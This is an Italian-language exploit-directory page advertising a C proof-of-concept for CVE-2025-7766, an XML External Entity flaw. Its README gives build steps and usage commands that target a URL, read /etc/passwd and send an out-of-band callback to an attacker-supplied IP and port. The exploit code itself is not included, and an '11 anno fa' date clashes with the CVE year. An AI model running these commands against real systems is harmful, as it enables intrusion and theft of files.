Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-7766 — Exploit PoC basato su C per CVE-2025-7766 che dimostra XXE-to-RCE tramite lettura di file e callback HTTP out-of-band. Supporta payload XML personalizzati e richieste ripetute. | Kitploit
Strumenti/GitHubGitHub/bytereaper77/cve-2025-7766
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo PayloadArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

Exploit PoC basato su C per CVE-2025-7766 che dimostra XXE-to-RCE tramite lettura di file e callback HTTP out-of-band. Supporta payload XML personalizzati e richieste ripetute.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-7766 Exploit PoC

PoC per sfruttare la vulnerabilità XML External Entity in CVE-2025-7766. Dimostra la lettura di file (/etc/passwd) e callback HTTP out-of-band.

Autore: Byte Reaper

CVE: CVE-2025-7766

Vulnerabilità: Esecuzione Remota di Codice tramite XML External Entity (XXE)


PoC per sfruttare XXE in CVE-2025-7766. Dimostra:

  • Lettura di /etc/passwd dal target.
  • Attivazione di una richiesta HTTP out-of-band verso il tuo server.

Requisiti

  • gcc
  • libcurl
  • libreria argparse

Compilazione

gcc -o exploit exploit.c argparse.c -lcurl

Utilizzo

# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

LICENZA:

MIT

Scarica lo strumento